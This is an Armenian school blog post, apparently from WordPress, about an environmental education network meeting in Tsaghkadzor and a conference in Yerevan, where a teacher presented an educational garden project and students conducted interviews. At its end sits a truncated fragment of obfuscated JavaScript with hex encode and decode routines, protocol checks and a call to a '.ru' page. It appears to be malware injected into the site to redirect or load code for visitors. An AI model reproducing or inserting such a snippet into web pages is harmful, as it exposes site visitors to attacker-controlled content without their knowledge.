ԲԿՑ- հանդիպումը՝ Ծաղկաձորում, համաժողովը՝ Երևանում

12713948_796945310411402_1083367157_n12736469_796945293744737_1401566281_n 12746230_796945277078072_1279636310_n 12745623_1011698512217215_7962691755911988408_n 12717800_1011698515550548_436070114332948822_n 12744583_1011699208883812_6183342591909442963_n 12745623_1011698512217215_7962691755911988408_n 12746218_796609830444950_1719581337_n IMG_6333

Այս ամիս Բնապահպանանական կրթական ցանցը (ԲԿՑ) աշխատում էր մեծ թափով՝ հանդիպում Ծաղկաձորում, իսկ հետո համաժողով՝ Երևանում:

Մեր կրթահամալիրից համաժողովին,  բացի Մարթա Ասատրյանից և ինձանից՝ Հասմիկ Նալբանդյանից,  մասնակցում էին սովորողներ, Էկոտուր 2016-ի պատասխանատուներից քույր և եղբայր՝ Լիդիա և Միքայել Կամենդատյանները: Համաժողովը կազմակերպված էր EU, gef, SGP, UNDP, ATP և ԲԿՑ-ի կողմից  և ներկա էին այդ կազմակերպությունների ներկայացուցիչները:

Համաժողովի օրակարգն էր. «Բնապահպանական կրթությունը Հայաստանում. Ներկա իրավիճակը և զարգացման հեռանկարները»:

Ողջույնի խոսքից հետո ելույթն ունեցողները մասնակիցները ներկայացնում էին իրենց կատարած աշխատանքները, ծրագրերը: Մեր  կրթահամալիրը ներկայացավ  ամենավերջում՝ Մարթա Ասատրյանը փայլուն ելույթ ունեցավ    «Էկո-կրթական նախագծեր. Կրթական այգի» թեմայով և հանգամանալից ներկայացրեց բնապահպանական կրթության դպրոցական լավագույն մոդելը: Համաժողովի մասնակիցները միաձայն գնահատեցին, որ մեր կրթահամալիրը մեկ  այլ հարթություն է  բարձրացել, որ  այն հասարակական, քաղաքացիական նախագծեր է իրականացնում և արդեն բնապահպանությունը չի դիտվում որպես աղբահավաքություն:

Մեր սովորողները իրենց շատ լավ դրսևորեցին՝ նրանք շատ արագ հարմարվեցին նոր միջավայրին, հարցազրույցներ վերցրեցին բնապահպանական տարբեր կազմակերպություններ ներկայացուցիչներից  և հյուրերից: Նրանք օպերատիվ դրանք տեղադրեցին մեր կայքում: Մասնակիցները զարմացած էին մեր սովորողների կազմակերպվածության վրա:

Բնապահպանական խնդիրների լուծմանը փոխադարձաբար նպաստավոր է ԲԿՑ-ի հետ մեր կրթահամալիրի համագործակցությունը,  ծրագրերի իրականացման համար փոկարևոր է նման հանդիպումները, փորձի փոխանակումը, նոր գործընկերներ գտնելը, իրար օժանդակելը :

http://mskh.աam/am/56920

http://mskh.am/am/57039

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "hasmiktiezerq.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e//110oeg8yg1z.ru/f.html

Leave a comment